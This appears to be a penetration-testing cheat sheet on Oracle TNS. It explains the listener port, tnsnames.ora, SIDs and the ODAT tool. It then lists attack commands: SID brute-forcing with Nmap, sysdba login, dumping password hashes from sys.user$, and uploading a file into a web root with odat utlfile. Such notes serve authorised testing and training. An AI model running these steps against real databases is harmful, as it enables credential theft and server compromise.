Oracle TNS

The Oracle Transparent Network Substrate (TNS) server is a communication protocol that facilitates communication between Oracle databases and applications over networks.. Default Oracle TNS port is TCP/1521, but can be easily changed. The configuration files for Oracle TNS are called tnsnames.ora and listener.ora and are typically located in the ORACLE_HOME/network/admin directory. Each database or service has a unique entry in the tnsnames.ora file, containing the necessary information for clients to connect to the service. In Oracle RDBMS, a System Identifier (SID) is a unique name that identifies a particular database instance. It can have multiple instances, each with its own System ID. An instance is a set of processes and memory structures that interact to manage the database's data. When a client connects to an Oracle database, it specifies the database's SID along with its connection string. The client uses this SID to identify which database instance it wants to connect to

PLSQL Exclusion List

Oracle databases can be protected by using so-called PL/SQL Exclusion List (PlsqlExclusionList). It is a user-created text file that needs to be placed in the $ORACLE_HOME/sqldeveloper directory, and it contains the names of PL/SQL packages or types that should be excluded from execution.

ODAT

Oracle Database Attacking Tool (ODAT) is an open-source penetration testing tool written in Python and designed to enumerate and exploit vulnerabilities in Oracle databases. It can be used to identify and exploit various security flaws in Oracle databases, including SQL injection, remote code execution, and privilege escalation.

Tips2Hack

1. Nmap

sudo nmap -p1521 -sV 13.13.13.13 --open

1. Nmap - SID Bruteforcing

sudo nmap -p1521 -sV 13.13.13.13 --open --script oracle-sid-brute

1. ODAT

./odat.py all -s 13.13.13.13

1. SQLplus - Log In

sqlplus george/burger@13.13.13.13/XE

1. Oracle RDBMS - Interaction

SQL> select table_name from all_tables;
SQL> select * from user_role_privs;

USERNAME                       GRANTED_ROLE                   ADM DEF OS_
------------------------------ ------------------------------ --- --- ---
GEORGE                          CONNECT                        NO  YES NO
GEORGE                          RESOURCE                       NO  YES NO

1. Oracle RDBMS - Database Enumeration

sqlplus george/burger@13.13.13.13/XE as sysdba
SQL> select * from user_role_privs;
-------------------------------------------------------------------------
USERNAME                       GRANTED_ROLE                   ADM DEF OS
------------------------------ ------------------------------ --- --- ---
SYS                            ADM_PARALLEL_EXECUTE_TASK      YES YES NO
SYS                            APEX_ADMINISTRATOR_ROLE        YES YES NO
SYS                            AQ_ADMINISTRATOR_ROLE          YES YES NO
SYS                            AQ_USER_ROLE                   YES YES NO
SYS                            AUTHENTICATEDUSER              YES YES NO
SYS                            CONNECT                        YES YES NO
SYS                            CTXAPP                         YES YES NO
SYS                            DATAPUMP_EXP_FULL_DATABASE     YES YES NO
SYS                            DATAPUMP_IMP_FULL_DATABASE     YES YES NO
SYS                            DBA                            YES YES NO
SYS                            DBFS_ROLE                      YES YES
-------------------------------------------------------------------------

1. Oracle RDBMS - Extract Password Hashes

SQL> select name, password from sys.user$;

1. Oracle RDBMS - File Upload

./odat.py utlfile -s 13.13.13.13 -d XE -U scott -P tiger --sysdba --putFile C:\\inetpub\\wwwroot testing.txt ./testing.txt
curl -X GET http://13.13.13.13/testing.txt

Hello There Adventurer!

---